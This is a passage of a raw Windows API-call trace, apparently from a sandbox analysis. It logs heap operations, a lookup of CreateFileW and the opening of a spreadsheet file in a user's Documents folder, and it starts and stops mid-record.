ftCreationTime.dwLowDateTime=0x6e6e2450, ftCreationTime.dwHighDateTime=0x1d56c16, ftLastAccessTime.dwLowDateTime=0x39fc4f70, ftLastAccessTime.dwHighDateTime=0x1d56b9a, ftLastWriteTime.dwLowDateTime=0x39fc4f70, ftLastWriteTime.dwHighDateTime=0x1d56b9a, nFileSizeHigh=0x0, nFileSizeLow=0x11fc2, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="mnsjU.xlsx", cAlternateFileName="MNSJU~1.XLS")) returned 0x41ac440 [0077.007] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0077.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0077.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0077.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0077.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0077.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0077.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0077.008] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0077.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0077.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0077.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e18 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0077.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0077.008] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0077.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0077.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0077.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0077.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0077.009] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0077.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0077.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0077.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0077.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2240 [0077.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0077.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0077.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0077.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0077.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0077.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0077.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0077.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21d0 [0077.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0077.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0077.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0077.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cf8 [0077.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0077.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0077.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0077.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0077.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0077.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0077.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0077.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0077.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0077.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0077.011] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0077.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0077.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0077.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0077.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.013] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0077.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.015] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0077.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca550, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0077.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.015] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0077.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0077.016] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\mnsjU.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\mnsju.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.017] FreeLibrary (hLibModule=0x772d0000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: 